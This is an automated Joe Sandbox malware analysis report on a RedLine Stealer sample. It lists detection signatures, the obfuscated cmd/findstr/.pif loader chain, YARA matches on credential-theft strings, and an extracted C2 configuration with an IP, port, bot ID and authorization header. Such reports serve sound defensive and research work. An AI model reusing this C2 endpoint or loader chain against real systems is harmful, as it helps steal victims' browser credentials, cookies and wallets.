Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Analysis ID:1632796
MD5:af3df67046abb1a4bd2600009fb51f19
SHA1:4dc05e14c3e44f51a02555d2230e1c2d8219d66f
SHA256:dc5eb50fd2c6a9351e5b2edb5ab4ddd31f5225ec5260380f05f8cf24e824bffd
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
DLL reload attack detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Renames NTDLL to bypass HIPS
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe" MD5: AF3DF67046ABB1A4BD2600009FB51F19)
    • svchost.exe (PID: 7408 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7480 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • tasklist.exe (PID: 7496 cmdline: tasklist /FI "imagename eq BullGuardCore.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 7512 cmdline: find /I /N "bullguardcore.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
        • tasklist.exe (PID: 7540 cmdline: tasklist /FI "imagename eq PSUAService.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 7548 cmdline: find /I /N "psuaservice.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
        • findstr.exe (PID: 7584 cmdline: findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Rarissima.exe.pif (PID: 7608 cmdline: Rarissima.exe.pif u MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • jsc.exe (PID: 7576 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
        • waitfor.exe (PID: 7620 cmdline: waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw MD5: E58E152B44F20DD099C5105DE482DF24)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "45.67.231.189:49441", "Bot Id": "mamonts", "Authorization Header": "b7fcef6957ac0cbb870615af4b502bf0"}
SourceRuleDescriptionAuthorStrings
0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_3d9371fdunknownunknown
    • 0x13637:$a1: get_encrypted_key
    • 0x12cf2:$a2: get_PassedPaths
    • 0x1165f:$a3: ChromeGetLocalName
    • 0x12f2c:$a4: GetBrowsers
    • 0x18a30:$a5: Software\Valve\SteamLogin Data
    • 0x17348:$a6: %appdata%\
    • 0x12a07:$a7: ScanPasswords
    0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_3d9371fdunknownunknown
      • 0x12bdf:$a1: get_encrypted_key
      • 0x2cbe7:$a1: get_encrypted_key
      • 0x467ef:$a1: get_encrypted_key
      • 0x5f587:$a1: get_encrypted_key
      • 0x1229a:$a2: get_PassedPaths
      • 0x2c2a2:$a2: get_PassedPaths
      • 0x45eaa:$a2: get_PassedPaths
      • 0x5ec42:$a2: get_PassedPaths
      • 0x10c07:$a3: ChromeGetLocalName
      • 0x2ac0f:$a3: ChromeGetLocalName
      • 0x44817:$a3: ChromeGetLocalName
      • 0x5d5af:$a3: ChromeGetLocalName
      • 0x124d4:$a4: GetBrowsers
      • 0x2c4dc:$a4: GetBrowsers
      • 0x460e4:$a4: GetBrowsers
      • 0x5ee7c:$a4: GetBrowsers
      • 0x17fd8:$a5: Software\Valve\SteamLogin Data
      • 0x31fe0:$a5: Software\Valve\SteamLogin Data
      • 0x4bbe8:$a5: Software\Valve\SteamLogin Data
      • 0x64980:$a5: Software\Valve\SteamLogin Data
      • 0x168f0:$a6: %appdata%\
      0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        19.2.jsc.exe.be0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          19.2.jsc.exe.be0000.0.unpackWindows_Trojan_RedLineStealer_3d9371fdunknownunknown
          • 0x13a2f:$a1: get_encrypted_key
          • 0x130ea:$a2: get_PassedPaths
          • 0x11a57:$a3: ChromeGetLocalName
          • 0x13324:$a4: GetBrowsers
          • 0x18e28:$a5: Software\Valve\SteamLogin Data
          • 0x17740:$a6: %appdata%\
          • 0x12dff:$a7: ScanPasswords
          19.2.jsc.exe.be0000.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
          • 0x11a23:$gen01: ChromeGetRoamingName
          • 0x11a57:$gen02: ChromeGetLocalName
          • 0x11a80:$gen03: get_UserDomainName
          • 0x13a2f:$gen04: get_encrypted_key
          • 0x13114:$gen05: browserPaths
          • 0x13324:$gen06: GetBrowsers
          • 0x12e99:$gen07: get_InstalledInputLanguages
          • 0x111ef:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
          • 0x17710:$spe0: Profile_encrypted_value
          • 0x17820:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
          • 0x189e0:$spe2: AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct
          • 0x18b80:$spe3: OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies
          • 0x18bf8:$spe4: //settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenter
          • 0x18cb0:$spe5: ROOT\SecurityCenter2Web DataSteamPath
          • 0x190f0:$spe6: windows-1251, CommandLine:
          • 0x13e26:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
          • 0x13ec6:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
          • 0x1476e:$spe9: *wallet*
          • 0xf9d0:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
          • 0xfa8a:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
          • 0xfed1:$typ03: A937C899247696B6565665BE3BD09607F49A2042
          19.2.jsc.exe.be0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x19108:$pat14: , CommandLine:
          • 0x12faf:$v2_1: ListOfProcesses
          • 0x12d6b:$v4_3: base64str
          • 0x139dc:$v4_4: stringKey
          • 0x11426:$v4_5: BytesToStringConverted
          • 0x1043a:$v4_6: FromBase64
          • 0x119df:$v4_8: procName
          • 0x11ce0:$v5_1: DownloadAndExecuteUpdate
          • 0x12c63:$v5_2: ITaskProcessor
          • 0x11cce:$v5_3: CommandLineUpdate
          • 0x11cbf:$v5_4: DownloadUpdate
          • 0x12191:$v5_5: FileScanning
          • 0x1166a:$v5_7: RecordHeaderField
          • 0x112b4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

          System Summary

          barindex
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Rarissima.exe.pif u, CommandLine: Rarissima.exe.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, ParentCommandLine: cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: Rarissima.exe.pif u, ProcessId: 7608, ProcessName: Rarissima.exe.pif
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe" , CommandLine: "C:\Windows\System32\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ParentProcessId: 7372, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe" , ProcessId: 7408, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe" , CommandLine: "C:\Windows\System32\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ParentProcessId: 7372, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe" , ProcessId: 7408, ProcessName: svchost.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeAvira: detected
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmpAvira: detection malicious, Label: DR/FakePic.Gen
          Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "45.67.231.189:49441", "Bot Id": "mamonts", "Authorization Header": "b7fcef6957ac0cbb870615af4b502bf0"}
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeVirustotal: Detection: 71%Perma Link
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeReversingLabs: Detection: 57%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
          Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbs source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ServiceModel.pdbKv source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbP source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: xBCzEiVyOcVH.dll.10.dr
          Source: Binary string: wntdll.pdb source: xBCzEiVyOcVH.dll.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbt source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000114C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00403287 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403287
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00402C10 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402C10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00402D2D FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402D2D
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009B4005
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_009B494A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009B3CE2
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_009BC2FF
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_009BCD9F
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BCD14 FindFirstFileW,FindClose,10_2_009BCD14
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_009BF5D8
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_009BF735
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_009BFA36

          Networking

          barindex
          Source: Malware configuration extractorURLs: 45.67.231.189:49441
          Source: global trafficTCP traffic: 192.168.2.4:49721 -> 45.67.231.189:49441
          Source: Joe Sandbox ViewASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
          Source: unknownDNS traffic detected: query: xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb replaycode: Name error (3)
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: unknownTCP traffic detected without corresponding DNS query: 45.67.231.189
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_009C29BA
          Source: global trafficDNS traffic detected: DNS query: xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyx
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/(
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
          Source: jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/(
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10LR
